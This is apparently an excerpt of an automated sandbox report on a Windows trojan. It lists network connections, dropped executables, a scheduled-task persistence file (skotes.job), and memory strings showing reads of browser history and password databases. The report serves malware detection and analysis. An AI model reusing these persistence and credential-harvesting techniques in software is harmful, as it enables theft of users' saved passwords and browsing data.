Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.150.243:443 -> 192.168.2.4:49856 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: section name:
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .rsrc
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: .idata
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: section name:
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: section name: .idata
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: section name:
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: section name: .idata
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: section name:
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: section name: .idata
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C5FED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C63B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C63B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C63B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5DF280
Creates files inside the system directory
Source: C:\Users\user\DocumentsIIEBKJECFC.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D35A0 0_2_6C5D35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E5440 0_2_6C5E5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64545C 0_2_6C64545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64542B 0_2_6C64542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64AC00 0_2_6C64AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C615C10 0_2_6C615C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C622C10 0_2_6C622C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FD4D0 0_2_6C5FD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C616CF0 0_2_6C616CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E64C0 0_2_6C5E64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DD4E0 0_2_6C5DD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6334A0 0_2_6C6334A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63C4A0 0_2_6C63C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E6C80 0_2_6C5E6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FED10 0_2_6C5FED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EFD00 0_2_6C5EFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C600512 0_2_6C600512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6385F0 0_2_6C6385F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C610DD0 0_2_6C610DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C646E63 0_2_6C646E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F9E50 0_2_6C5F9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F4640 0_2_6C5F4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C622E4E 0_2_6C622E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DC670 0_2_6C5DC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C613E50 0_2_6C613E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C639E30 0_2_6C639E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C625600 0_2_6C625600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C617E10 0_2_6C617E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6476E3 0_2_6C6476E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DBEF0 0_2_6C5DBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EFEF0 0_2_6C5EFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C634EA0 0_2_6C634EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F5E90 0_2_6C5F5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63E680 0_2_6C63E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E9F00 0_2_6C5E9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C617710 0_2_6C617710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C606FF0 0_2_6C606FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DDFE0 0_2_6C5DDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6277A0 0_2_6C6277A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F8850 0_2_6C5F8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FD850 0_2_6C5FD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61F070 0_2_6C61F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61B820 0_2_6C61B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C624820 0_2_6C624820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E7810 0_2_6C5E7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6158E0 0_2_6C6158E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6450C7 0_2_6C6450C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FC0E0 0_2_6C5FC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6060A0 0_2_6C6060A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B970 0_2_6C62B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64B170 0_2_6C64B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FA940 0_2_6C5FA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ED960 0_2_6C5ED960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60D9B0 0_2_6C60D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C615190 0_2_6C615190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C632990 0_2_6C632990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DC9A0 0_2_6C5DC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C619A60 0_2_6C619A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61E2F0 0_2_6C61E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C618AC0 0_2_6C618AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F1AF0 0_2_6C5F1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C604AA0 0_2_6C604AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C642AB0 0_2_6C642AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ECAB0 0_2_6C5ECAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64BA90 0_2_6C64BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D22A0 0_2_6C5D22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D5340 0_2_6C5D5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EC370 0_2_6C5EC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61D320 0_2_6C61D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6453C8 0_2_6C6453C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DF380 0_2_6C5DF380
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_00388860 9_2_00388860
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_00387049 9_2_00387049
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_003878BB 9_2_003878BB
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_003831A8 9_2_003831A8
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_00344B30 9_2_00344B30
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_00382D10 9_2_00382D10
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_00344DE0 9_2_00344DE0
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_00377F36 9_2_00377F36
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_0038779B 9_2_0038779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E578BB 10_2_00E578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E58860 10_2_00E58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E57049 10_2_00E57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E531A8 10_2_00E531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E14B30 10_2_00E14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E14DE0 10_2_00E14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E52D10 10_2_00E52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E5779B 10_2_00E5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E47F36 10_2_00E47F36
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: String function: 003580C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C60CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00E280C0 appears 130 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2190284321.000000006C855000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2189902597.000000006C662000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2186074735.0000000023173000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIP; vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: sgoicwpi ZLIB complexity 0.9949636104441777
Source: accd68d705.exe, 00000012.00000002.2665613882.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C.vBP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@46/46@7/9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C637030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C637030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0HEDYG0F.htm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\DocumentsIIEBKJECFC.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2164783980.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT url FROM moz_places LIMIT 1000;Liq
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2003083223.000000001D035000.00000004.00000020.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2406740517.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 0000000D.00000003.2407035686.0000000005C3A000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542052712.00000000057E6000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000011.00000003.2542575605.00000000057CA000.00000004.00000800.00020000.00000000.sdmp, c3e1e78f6d.exe, 00000017.00000003.2808234244.0000000005574000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2189508620.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2178846824.000000001D13C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
